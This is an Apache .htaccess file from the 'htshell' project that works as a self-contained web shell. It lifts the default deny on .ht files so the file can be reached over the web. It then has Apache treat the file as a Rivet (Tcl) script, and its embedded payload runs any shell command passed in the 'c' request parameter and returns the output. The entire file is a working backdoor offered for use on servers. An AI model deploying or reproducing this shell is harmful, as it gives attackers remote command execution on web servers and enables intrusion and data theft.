# <!--  Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as rivet file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-rivet .htaccess

###### SHELL ###### <? if { [var exists c] } { puts [exec sh -c [var get c]] } ?>

